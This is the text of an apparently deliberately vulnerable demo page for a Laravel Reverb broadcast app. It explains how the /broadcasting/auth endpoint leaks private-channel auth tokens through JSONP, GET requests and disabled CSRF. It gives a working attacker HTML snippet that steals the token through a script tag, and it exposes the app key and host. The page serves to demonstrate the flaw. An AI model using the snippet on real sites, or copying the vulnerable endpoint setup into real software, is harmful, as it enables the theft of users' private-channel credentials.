JSONP Broadcast Auth Demo

Logged in as Test User ([email protected])

Send Secret Message

Broadcasts an event on the private-secret-data channel.

Real-time Messages

Connecting...

Listening on private-secret-data via Laravel Echo.

Waiting for messages...

Reverb Connection Config

These values are embedded in the built JavaScript and visible to anyone. Use them to configure the attacker page.

App Key BZVy3zWTNpjbY6R5KhgJ
Host ws-a10d9dd8-8393-46e7-91a2-19ff7ff0642b-reverb.laravel.cloud
Port 443
Scheme https

JSONP Vulnerability Details

The /broadcasting/auth endpoint supports JSONP via a callback query parameter. It also accepts GET requests and has CSRF disabled. This means an attacker-controlled page can use a <script> tag to steal your channel auth token.

Normal JSON response (POST without callback):

POST /broadcasting/auth
Content-Type: application/x-www-form-urlencoded

channel_name=private-secret-data&socket_id=123456.654321

Response: {"auth":"app_key:hmac_signature"}

JSONP response (GET with callback) — the vulnerability:

GET /broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123456.654321

Response: /**/ typeof steal === 'function' && steal({"auth":"app_key:hmac_signature"});

Attacker's HTML:

<script>function steal(data) { console.log('Stolen:', data.auth); }</script>
<script src="https://jsonp-reverb-victim.evilhacker.dev/broadcasting/auth?callback=steal&channel_name=private-secret-data&socket_id=123.456"></script>